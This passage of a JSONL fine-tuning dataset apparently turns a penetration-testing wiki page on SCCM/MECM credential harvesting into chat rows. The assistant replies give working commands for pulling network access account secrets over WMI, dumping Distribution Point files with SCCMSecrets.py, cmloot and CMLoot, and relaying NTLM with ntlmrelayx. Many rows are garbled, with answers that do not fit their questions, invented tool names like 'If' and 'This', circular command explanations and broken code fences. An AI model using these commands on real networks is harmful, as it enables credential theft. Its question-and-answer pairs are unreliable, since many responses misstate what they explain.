"Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Native Powershell?"}, {"role": "assistant", "content": "Get-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_NetworkAccessAccount\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_TaskSequence\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_CollectionVariable\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Native Powershell?", "response": "Get-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_NetworkAccessAccount\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_TaskSequence\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_CollectionVariable\n```\n\n:::", "metadata": {"corpus_index": 1062, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Native Powershell?"}, {"role": "assistant", "content": "Get-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_NetworkAccessAccount\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_TaskSequence\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_CollectionVariable\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Native Powershell?", "response": "Get-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_NetworkAccessAccount\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_TaskSequence\nGet-WmiObject -Namespace ROOT\\ccm\\policy\\Machine\\ActualConfig -Class CCM_CollectionVariable\n```\n\n:::", "metadata": {"corpus_index": 1062, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Credential harvesting - Distribution Point resources"}, {"role": "assistant", "content": "By default, any authenticated user can retrieve Distribution Point resources which may contain secrets.\n\nResources can be downloaded through the SMB or HTTP protocols.\n\nAs previously mentioned, note that if anonymous access was configured on a Distribution Point, only the HTTP protocol can be used to download files without any credentials.\n\n::: tabs\n\n=== UNIX-based"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Credential harvesting - Distribution Point resources", "response": "By default, any authenticated user can retrieve Distribution Point resources which may contain secrets.\n\nResources can be downloaded through the SMB or HTTP protocols.\n\nAs previously mentioned, note that if anonymous access was configured on a Distribution Point, only the HTTP protocol can be used to download files without any credentials.\n\n::: tabs\n\n=== UNIX-based", "metadata": {"corpus_index": 1063, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Credential harvesting - Distribution Point resources"}, {"role": "assistant", "content": "By default, any authenticated user can retrieve Distribution Point resources which may contain secrets.\n\nResources can be downloaded through the SMB or HTTP protocols.\n\nAs previously mentioned, note that if anonymous access was configured on a Distribution Point, only the HTTP protocol can be used to download files without any credentials.\n\n::: tabs\n\n=== UNIX-based"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Credential harvesting - Distribution Point resources", "response": "By default, any authenticated user can retrieve Distribution Point resources which may contain secrets.\n\nResources can be downloaded through the SMB or HTTP protocols.\n\nAs previously mentioned, note that if anonymous access was configured on a Distribution Point, only the HTTP protocol can be used to download files without any credentials.\n\n::: tabs\n\n=== UNIX-based", "metadata": {"corpus_index": 1063, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Credential harvesting - HTTP"}, {"role": "assistant", "content": "Regarding the HTTP protocol on Unix, SCCMSecrets.py (Python) can be used to index and download files from Distribution Points.\n\nNot providing any credentials will attempt to exploit anonymous access on the Distribution Point. HTTPS and client authentication is also supported by this tool.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Credential harvesting - HTTP", "response": "Regarding the HTTP protocol on Unix, SCCMSecrets.py (Python) can be used to index and download files from Distribution Points.\n\nNot providing any credentials will attempt to exploit anonymous access on the Distribution Point. HTTPS and client authentication is also supported by this tool.\n\n```bash", "metadata": {"corpus_index": 1064, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Credential harvesting - HTTP during a pentest?"}, {"role": "assistant", "content": "Regarding the HTTP protocol on Unix, SCCMSecrets.py (Python) can be used to index and download files from Distribution Points.\n\nNot providing any credentials will attempt to exploit anonymous access on the Distribution Point. HTTPS and client authentication is also supported by this tool.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Credential harvesting - HTTP during a pentest?", "response": "Regarding the HTTP protocol on Unix, SCCMSecrets.py (Python) can be used to index and download files from Distribution Points.\n\nNot providing any credentials will attempt to exploit anonymous access on the Distribution Point. HTTPS and client authentication is also supported by this tool.\n\n```bash", "metadata": {"corpus_index": 1064, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Downloads files with specific extensions?"}, {"role": "assistant", "content": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -H '$HASH' --extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Downloads files with specific extensions?", "response": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -H '$HASH' --extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'", "metadata": {"corpus_index": 1065, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Downloads files with specific extensions during a pentest?"}, {"role": "assistant", "content": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -H '$HASH' --extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Downloads files with specific extensions during a pentest?", "response": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -H '$HASH' --extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'", "metadata": {"corpus_index": 1065, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Having indexed files first, downloads specific files from the Distribution Point"}, {"role": "assistant", "content": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -p '$PASSWORD' --urls to_download.lst"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Having indexed files first, downloads specific files from the Distribution Point", "response": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -p '$PASSWORD' --urls to_download.lst", "metadata": {"corpus_index": 1066, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Having indexed files first, downloads specific files from the Distribution Point?"}, {"role": "assistant", "content": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -p '$PASSWORD' --urls to_download.lst"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Having indexed files first, downloads specific files from the Distribution Point?", "response": "python3 SCCMSecrets.py files -dp http://$DP_IP -u '$USER' -p '$PASSWORD' --urls to_download.lst", "metadata": {"corpus_index": 1066, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Perform file dump attack via HTTPS and client certificate authentication work?"}, {"role": "assistant", "content": "python3 SCCMSecrets.py files -dp https://$DP_IP -u '$USER' -p '$PASSWORD' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nIf anonymous access is enabled on the Distribution Point, sccm-http-looter (Golang) can also be used. It may be faster as it is written in Golang.\n\n`bash\n./sccm-http-looter -server 10.10.10.10\n`\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account. \n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/sms_dp_smspkg$/Datalib' -smb2support --sccm-dp -debug\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Perform file dump attack via HTTPS and client certificate authentication work?", "response": "python3 SCCMSecrets.py files -dp https://$DP_IP -u '$USER' -p '$PASSWORD' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nIf anonymous access is enabled on the Distribution Point, sccm-http-looter (Golang) can also be used. It may be faster as it is written in Golang.\n\n`bash\n./sccm-http-looter -server 10.10.10.10\n`\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account. \n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/sms_dp_smspkg$/Datalib' -smb2support --sccm-dp -debug\n``", "metadata": {"corpus_index": 1067, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Perform file dump attack via HTTPS and client certificate authentication"}, {"role": "assistant", "content": "python3 SCCMSecrets.py files -dp https://$DP_IP -u '$USER' -p '$PASSWORD' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nIf anonymous access is enabled on the Distribution Point, sccm-http-looter (Golang) can also be used. It may be faster as it is written in Golang.\n\n`bash\n./sccm-http-looter -server 10.10.10.10\n`\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account. \n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/sms_dp_smspkg$/Datalib' -smb2support --sccm-dp -debug\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Perform file dump attack via HTTPS and client certificate authentication", "response": "python3 SCCMSecrets.py files -dp https://$DP_IP -u '$USER' -p '$PASSWORD' --pki-cert ./cert.pem --pki-key ./key.pem\n``\n\nIf anonymous access is enabled on the Distribution Point, sccm-http-looter (Golang) can also be used. It may be faster as it is written in Golang.\n\n`bash\n./sccm-http-looter -server 10.10.10.10\n`\n\nThis attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account. \n`bash\npython3 examples/ntlmrelayx.py -t 'http://mecm.sccm.lab/sms_dp_smspkg$/Datalib' -smb2support --sccm-dp -debug\n``", "metadata": {"corpus_index": 1067, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the If command for perform file dump attack via https and client certificate authentication"}, {"role": "assistant", "content": "If anonymous access is enabled on the Distribution Point, [sccm-http-looter](https://github.com/badsectorlabs/sccm-http-looter) (Golang) can also be used. It may be faster as it is written in Golang."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the If command for perform file dump attack via https and client certificate authentication", "response": "If anonymous access is enabled on the Distribution Point, [sccm-http-looter](https://github.com/badsectorlabs/sccm-http-looter) (Golang) can also be used. It may be faster as it is written in Golang.", "metadata": {"corpus_index": 1068, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "If"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Perform file dump attack via HTTPS and client certificate authentication"}, {"role": "assistant", "content": "If anonymous access is enabled on the Distribution Point, [sccm-http-looter](https://github.com/badsectorlabs/sccm-http-looter) (Golang) can also be used. It may be faster as it is written in Golang."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Perform file dump attack via HTTPS and client certificate authentication", "response": "If anonymous access is enabled on the Distribution Point, [sccm-http-looter](https://github.com/badsectorlabs/sccm-http-looter) (Golang) can also be used. It may be faster as it is written in Golang.", "metadata": {"corpus_index": 1068, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `If anonymous access is enabled on the Distribution Point, [sccm-http-looter](https://github.com/badsectorlabs/sccm-http-looter) (Golang) can also be used. It may be faster as it is written in Golang.`?"}, {"role": "assistant", "content": "This command is used for perform file dump attack via https and client certificate authentication. Perform file dump attack via HTTPS and client certificate authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `If anonymous access is enabled on the Distribution Point, [sccm-http-looter](https://github.com/badsectorlabs/sccm-http-looter) (Golang) can also be used. It may be faster as it is written in Golang.`?", "response": "This command is used for perform file dump attack via https and client certificate authentication. Perform file dump attack via HTTPS and client certificate authentication", "metadata": {"corpus_index": 1068, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the This syntax for perform file dump attack via https and client certificate authentication?"}, {"role": "assistant", "content": "This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the This syntax for perform file dump attack via https and client certificate authentication?", "response": "This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account.", "metadata": {"corpus_index": 1069, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "This"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Perform file dump attack via HTTPS and client certificate authentication"}, {"role": "assistant", "content": "This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Perform file dump attack via HTTPS and client certificate authentication", "response": "This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account.", "metadata": {"corpus_index": 1069, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account.`?"}, {"role": "assistant", "content": "This command is used for perform file dump attack via https and client certificate authentication. Perform file dump attack via HTTPS and client certificate authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `This attack is also possible via NTLM relay if you are able to relay the authentication data of a domain account.`?", "response": "This command is used for perform file dump attack via https and client certificate authentication. Perform file dump attack via HTTPS and client certificate authentication", "metadata": {"corpus_index": 1069, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Credential harvesting - SMB?"}, {"role": "assistant", "content": "Regarding the SMB protocol, cmloot.py (Python) can be used to dump files.\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Credential harvesting - SMB?", "response": "Regarding the SMB protocol, cmloot.py (Python) can be used to dump files.\n```bash", "metadata": {"corpus_index": 1070, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Credential harvesting - SMB during a pentest?"}, {"role": "assistant", "content": "Regarding the SMB protocol, cmloot.py (Python) can be used to dump files.\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Credential harvesting - SMB during a pentest?", "response": "Regarding the SMB protocol, cmloot.py (Python) can be used to dump files.\n```bash", "metadata": {"corpus_index": 1070, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Enumerate SCCM servers, build inventory and download in the context of penetration testing"}, {"role": "assistant", "content": "python3 cmloot.py $DOMAIN/$USER@$TARGET -findsccmservers -target-file sccmhosts.txt -cmlootdownload sccmfiles.txt\n```\n\n=== Windows-based"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Enumerate SCCM servers, build inventory and download in the context of penetration testing", "response": "python3 cmloot.py $DOMAIN/$USER@$TARGET -findsccmservers -target-file sccmhosts.txt -cmlootdownload sccmfiles.txt\n```\n\n=== Windows-based", "metadata": {"corpus_index": 1071, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Enumerate SCCM servers, build inventory and download"}, {"role": "assistant", "content": "python3 cmloot.py $DOMAIN/$USER@$TARGET -findsccmservers -target-file sccmhosts.txt -cmlootdownload sccmfiles.txt\n```\n\n=== Windows-based"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Enumerate SCCM servers, build inventory and download", "response": "python3 cmloot.py $DOMAIN/$USER@$TARGET -findsccmservers -target-file sccmhosts.txt -cmlootdownload sccmfiles.txt\n```\n\n=== Windows-based", "metadata": {"corpus_index": 1071, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Credential harvesting - SMB"}, {"role": "assistant", "content": "On Windows, CMLoot (Powershell) was the original implementation of the attack in Powershell.\n\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Credential harvesting - SMB", "response": "On Windows, CMLoot (Powershell) was the original implementation of the attack in Powershell.\n\n```powershell", "metadata": {"corpus_index": 1072, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Credential harvesting - SMB?"}, {"role": "assistant", "content": "On Windows, CMLoot (Powershell) was the original implementation of the attack in Powershell.\n\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Credential harvesting - SMB?", "response": "On Windows, CMLoot (Powershell) was the original implementation of the attack in Powershell.\n\n```powershell", "metadata": {"corpus_index": 1072, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Index available files work?"}, {"role": "assistant", "content": "Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Index available files work?", "response": "Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt", "metadata": {"corpus_index": 1073, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Index available files"}, {"role": "assistant", "content": "Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Index available files", "response": "Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt", "metadata": {"corpus_index": 1073, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Download a single file in the context of penetration testing"}, {"role": "assistant", "content": "Invoke-CMLootDownload -SingleFile \\\\sccm\\SCCMContentLib$\\DataLib\\SC100001.1\\x86\\MigApp.xml"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Download a single file in the context of penetration testing", "response": "Invoke-CMLootDownload -SingleFile \\\\sccm\\SCCMContentLib$\\DataLib\\SC100001.1\\x86\\MigApp.xml", "metadata": {"corpus_index": 1074, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Download a single file"}, {"role": "assistant", "content": "Invoke-CMLootDownload -SingleFile \\\\sccm\\SCCMContentLib$\\DataLib\\SC100001.1\\x86\\MigApp.xml"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Download a single file", "response": 